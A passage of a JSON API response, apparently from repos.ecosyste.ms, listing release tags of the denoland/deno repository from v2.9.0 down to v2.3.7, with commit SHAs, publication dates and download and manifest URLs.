es/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manife